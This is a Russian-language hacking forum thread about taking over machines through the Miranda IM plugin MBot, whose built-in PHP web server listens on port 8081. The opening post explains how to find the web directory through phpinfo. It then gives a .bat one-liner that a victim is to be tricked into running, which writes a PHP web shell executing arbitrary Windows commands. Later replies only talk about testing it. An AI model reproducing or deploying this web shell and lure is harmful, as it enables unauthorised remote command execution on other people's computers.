Получение шелла через MBot

Discussion in 'Skype, IRC, ICQ, Jabber и другие IM' started by Goudini, 1 Dec 2006.

  1. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Получение шелла через MBot

    Теория

    MBot - сервисный плагин Миранды, позволяющий писать скрипты на PHP как плагины для Миранды. Он включает веб сервер на 8081 порту. В WWW каталоге размещаеться только 1 файл index.php с результатом работы phpinfo(). Толку нам от него мало. Вот если бы можно было писать в файл...

    Практика

    Получаеться когда включаеться Миранда, одновременно запускаеться веб-сервер. Если юзер об этом не знает можно попробовать получить веб-шелл на тачке.
    Просмотрев файл index.php через браузер можно узнать путь к скрипту. Например D:/Miranda/MBot/WWW/index.php

    Теперь нужно заставить жертву создать файл, который будет содержать шелл
    Я сделал такой .bat файл
    Code:
    echo "<?='<pre>'.convert_cyr_string(htmlspecialchars(`$cmd`),'d','w').'</pre>'?>" > D:/Miranda/MBot/WWW/test.php
    После запуска этого файла на удаллённом компе в веб-директории будет шелл, через который мы сможем выплонять команды винды. Он будет работать пока включена Миранда.
     
  2. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Щас протестим! Теоритический ты убедил, а вот щас посмотрим на практике!
     
  3. cheet

    cheet Banned

    Joined:
    22 Sep 2006
    Messages:
    70
    Likes Received:
    12
    Reputations:
    -8
    ну что получается у кого нить такая фишка.